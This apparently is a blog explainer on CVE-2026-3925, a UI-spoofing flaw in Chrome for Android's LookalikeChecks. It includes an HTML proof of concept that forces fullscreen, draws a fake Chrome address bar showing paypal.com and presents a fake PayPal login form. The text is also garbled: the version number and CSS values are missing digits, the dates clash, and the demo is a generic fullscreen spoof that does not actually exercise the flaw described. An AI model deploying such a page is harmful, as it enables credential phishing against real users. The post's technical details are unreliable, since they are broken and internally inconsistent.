CVE-2026-3925 - UI Spoofing in Google Chrome for Android via LookalikeChecks Flaw

---

In June 2026, a security issue—CVE-2026-3925—was reported in Google Chrome on Android devices. This vulnerability is related to the browser’s LookalikeChecks feature, which was designed to warn users if they're visiting a domain name that looks suspiciously similar to a more popular site. If you’ve ever seen a warning that a site might be trying to look like "paypal.com" but is actually "paypa1.com," that’s LookalikeChecks at work.

However, before version 146..768.71, a user interface (UI) bug allowed attackers to trick users despite those protections. In this long read, we’ll break down what happened, how it can be exploited, and why it matters for everyday Chrome users on Android. We’ll also share references and a simple proof-of-concept to help you understand the risk.

What is CVE-2026-3925?

According to the Chromium security release notes, CVE-2026-3925 is an *incorrect security UI in LookalikeChecks in Google Chrome on Android prior to 146..768.71*. This allowed a remote attacker to perform UI spoofing via a crafted HTML page. Google marked the severity as "Medium," but UI spoofing can still be pretty dangerous if users don't realize they're being tricked.

In Simple Words

If you visited a suspicious website on your phone using Chrome (before the fix), that website could hide Chrome’s warning that the site is suspicious. This means you might *think* the site is safe, even though it's a lookalike crafted by an attacker to steal your data.

The Attacker Creates a Lookalike Site

Say, instead of www.paypal.com, they register www.paypa1.com (with a digit “1” instead of the letter “l”).

Bypasses Chrome’s Warning UI

Normally, Chrome's LookalikeChecks would flag this site and warn you. But with CVE-2026-3925, the attacker can present a fake or manipulated UI—like hiding the warning, overlaying their own message, or emulating the Chrome interface using HTML and CSS.

User Gets Fooled

The user thinks they're either on the real site or on a site Chrome says is safe, logs in, and the attacker grabs their credentials.

Proof of Concept: Simple Exploit Demo

Here's a simplified snippet showing how an attacker might spoof the URL bar using full-screen mode and custom HTML/CSS. (Don’t use this for actual malicious purposes.)

<!DOCTYPE html>
<html>
  <head>
    <style>
      /* Fake Address Bar */
      #fake-chrome-bar {
        position: fixed;
        top: ;
        left: ;
        width: 100vw;
        height: 56px;
        background: #f1f3f4;
        color: #222;
        font-family: sans-serif;
        display: flex;
        align-items: center;
        box-shadow:  2px 4px rgba(,,,.06);
        z-index: 10000;
      }
      #fake-chrome-bar img {
        margin-left: 16px;
        margin-right: 8px;
        width: 24px;
      }
      #fake-url {
        font-size: 18px;
      }
      body {
        margin: ;
        padding-top: 56px; /* offset for fake bar */
      }
    </style>
    <script>
      // Puts Chrome in full screen automatically (Android only)
      document.addEventListener('DOMContentLoaded', () => {
        if (document.documentElement.requestFullscreen) {
          document.documentElement.requestFullscreen();
        }
      });
    </script>
  </head>
  <body>
    <div id="fake-chrome-bar">
      <img src="https://www.google.com/favicon.ico">;
      <span id="fake-url">https://www.paypal.com</span>;
    </div>
    <h1>PayPal Login</h1>
    <form>
      Email: <input type="email">

      Password: <input type="password">

      <button>Log In</button>
    </form>
  </body>
</html>

Explanation:
- The code hides the real address bar using full-screen mode (often auto-triggered with JavaScript or by user interaction).
- It then *draws* a fake address bar that looks almost identical to Chrome’s, showing the trusted www.paypal.com URL—even though that's not the real domain.

Original References

- Chromium Security Release Notes (CVE-2026-3925)
- Official Chrome Advisory (if available)
- Chromium Issue Tracker (search "CVE-2026-3925")
- Google Security Blog: Lookalike Domains and UI Spoofing

Why Is This Important?

UI spoofing attacks are scary because *even careful users can be tricked*. Most of us trust the browser interface, so if a malicious site can fake or hide real warnings from Chrome, we’re left with little protection. This can lead to phishing, credential theft, and financial loss.

The bug in LookalikeChecks meant users didn’t get the warning they should have gotten, giving attackers the upper hand.

How Was It Fixed?

Google patched the bug in Chrome for Android version 146..768.71. After the fix, LookalikeChecks and warning dialogs cannot be hidden or covered up by sites’ own elements in the way described. Always make sure your browser is up-to-date.

Enable Extra Protections:

Use a password manager (it often won’t autofill on phishing sites) and enable two-factor authentication on important accounts.

Final Thoughts

CVE-2026-3925 is another real-world lesson about how even subtle UI bugs can have outsized consequences, especially on mobile where the screen is small and users are used to fast, tap-and-go browsing. Stay alert, and keep your software up to date to stay a step ahead of attackers.


*This post was put together exclusively to help you understand CVE-2026-3925 in easy terms. For more details, check the resources above and always follow security updates from your browser vendor.*

Timeline

Published on: 03/11/2026 22:04:08 UTC
Last modified on: 03/13/2026 20:15:58 UTC